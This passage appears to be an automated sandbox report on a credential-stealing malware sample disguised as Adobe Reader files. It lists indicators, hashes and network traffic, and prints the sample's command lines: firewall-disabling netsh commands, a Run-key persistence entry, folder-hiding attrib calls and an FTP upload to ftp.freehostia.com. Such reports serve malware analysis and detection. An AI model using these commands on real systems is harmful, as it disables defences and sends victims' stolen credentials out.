| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Order details 20160622131330.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order details 20160622131330.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\DefaultIcon\ = "%SystemRoot%\\SysWow64\\imageres.dll,-117" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InProcServer32\ = "%SystemRoot%\\SysWow64\\windows.storage.dll" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ShellFolder | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ShellFolder\RestrictedAttributes = "50" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Order details 20160622131330.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InProcServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\shellex\ContextMenuHandlers\{A8E64375-B645-4314-9EFC-C085981786FA} | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ShellFolder\Attributes = "537133056" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\shellex | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\NoPreviousVersions | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\DefaultIcon | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InProcServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Order details 20160622131330.exe
"C:\Users\Admin\AppData\Local\Temp\Order details 20160622131330.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4448,i,1330210614411927383,9239043499051775691,262144 --variations-seed-version --mojo-platform-channel-handle=4408 /prefetch:8
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set profiles state off
C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
AReader 5400
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.freehostia.com | udp |
| US | 198.23.57.8:21 | ftp.freehostia.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
| MD5 | ce8041824149d8266dbb0ad9688224d7 |
| SHA1 | 3ab653c43ce66681ceaab90193e1a4c95d998090 |
| SHA256 | 0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5 |
| SHA512 | e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
| MD5 | 97410477dc9501dffca4ea4b1ae57273 |
| SHA1 | fb573b3bf4eba734b0f32db1a5b7ff78de36b064 |
| SHA256 | 3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c |
| SHA512 | 3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
| MD5 | 3599c797ad0bf899791bfa24413c3ab6 |
| SHA1 | 215a520638bb3f1336f268d1acc1170bf2ce0768 |
| SHA256 | 0a9963eefd15805efaef32bf961b354fc255a5a23b4d466aa8e94df53a3c3e8c |
| SHA512 | add003202c97629f2d87d4b7f1876d79dc1ae35cfc85fc55e578adbc3cc009e41ca42c66f33521acb5d8a651fe31d69de5699af1df82ada8227bbeeddbe8d5d1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat
| MD5 | 89412aba215b6cd18b8a64c4485fa03f |
| SHA1 | 37089346499f54a7d89262a67d95c8764ab3ca1f |
| SHA256 | 9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1 |
| SHA512 | 7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
| MD5 | 3351585db91521d6fa543490ac7cd6a5 |
| SHA1 | 9be2b3abf17613d7386f9949cabaedd466902e82 |
| SHA256 | 3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4 |
| SHA512 | 804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
| MD5 | 75a35514185cd2c5cf5aab50cc380963 |
| SHA1 | f1ff1e088f910398a48f4f7dfddec24e6d6d1734 |
| SHA256 | 1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937 |
| SHA512 | ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
| MD5 | 09082253605a7171f078e26dc308a667 |
| SHA1 | 585286c9fcda5e66e7fdb4e17a7bab6160183d46 |
| SHA256 | f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed |
| SHA512 | adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
| MD5 | ce7ccd3b48dbe8f34db3b2b1222e4fd9 |
| SHA1 | e25f9947c2b250c98dffd7bfeaca75b4db17dcfd |
| SHA256 | 6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e |
| SHA512 | ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
| MD5 | 1a1075e5e307f3a4b8527110a51ce827 |
| SHA1 | f453838ed21020b7ca059244feea8579e5aa74ef |
| SHA256 | ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5 |
| SHA512 | b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
| MD5 | 97b8dbcc7b3cc290aef4241df911ac2e |
| SHA1 | 733ababbcd278821d4e3ee78580841981f26642e |
| SHA256 | c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023 |
| SHA512 | 4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25 |
memory/2592-53-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/4524-58-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/4524-59-0x0000000002930000-0x0000000002B3C000-memory.dmp
memory/4524-63-0x0000000002930000-0x0000000002B3C000-memory.dmp
memory/4524-70-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/4524-71-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/4524-73-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/4524-72-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/4524-74-0x0000000002930000-0x0000000002B3C000-memory.dmp
memory/4524-80-0x0000000002930000-0x0000000002B3C000-memory.dmp
memory/4524-84-0x0000000002930000-0x0000000002B3C000-memory.dmp
memory/2592-86-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/3688-90-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/4460-94-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/4460-96-0x00000000029E0000-0x0000000002BEC000-memory.dmp
memory/4460-101-0x00000000029E0000-0x0000000002BEC000-memory.dmp
C:\ProgramData\TEMP\RAIDTest
| MD5 | c2f09542b6c7daf4288f3524c8cebb18 |
| SHA1 | 9430b21baf07f0d105b9ee5fdd9f868418454517 |
| SHA256 | 55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4 |
| SHA512 | dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672 |
C:\ProgramData\Licenses\086A4C8982A52E70F.Lic
| MD5 | 33b4a9c5d50af6417aa177e3a03f83e6 |
| SHA1 | 843c5ff44b8a25a2d650fd4140bdf13b1acf60a5 |
| SHA256 | 2ef0015acc1ba0b6553a0dcbd443ee887765c56a6410346e5545128bd3710ac6 |
| SHA512 | 1869740b8208c2ead78e0fb60d8f7775e8add6f07398ca7fb139c3d00d693b2b7dd5061f13eb42965391894a0499fc4eed4e6bb83c67c762ae509524c0ea8b05 |
C:\ProgramData\TEMP:663565B1
| MD5 | 081cfbc85addf83ca4f4afa6b5c1e7e3 |
| SHA1 | 45ae8d0814b9b870b194385d66470bbba8dd9896 |
| SHA256 | ccd6ecf56e05f3baba1460940308fd3ca0e4c90032ac752cb0ddeae83ae06cea |
| SHA512 | 845f8d9bc1e3a1276fe253c226866e9988bba754e5acc1d84597d370326867a089f0eeec5606657c5f3ccebc626cde635ff39eb026f65ee86ba63e9e8de178e3 |
memory/4460-109-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/4460-110-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/4460-112-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/4460-111-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/4460-113-0x00000000029E0000-0x0000000002BEC000-memory.dmp
memory/4460-119-0x00000000029E0000-0x0000000002BEC000-memory.dmp
memory/3688-120-0x0000000000400000-0x00000000006B7000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011
| MD5 | f60c73e7c036cbae80c2f8d768e6f95c |
| SHA1 | 4a50bdf24772aa2853a8807b7ec5fad79943366b |
| SHA256 | ebaa4a2d7a26e8aafebc354e77d1a5660c829041b5db7f4eb1d4677c327ac14f |
| SHA512 | a1c59641bc3534e6ec05b71fb9fc9aeaea0bf8f0c68bcaa9581225300f46843b24c0bd11b5644e9cd68060cf78a06ae408eb7f4374589ccb60cee178e54bce31 |
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112
| MD5 | 3c305699054489d4ba953729549294b8 |
| SHA1 | 272b920622013b83dc073c26b75f5968663496c5 |
| SHA256 | 52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8 |
| SHA512 | 7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b |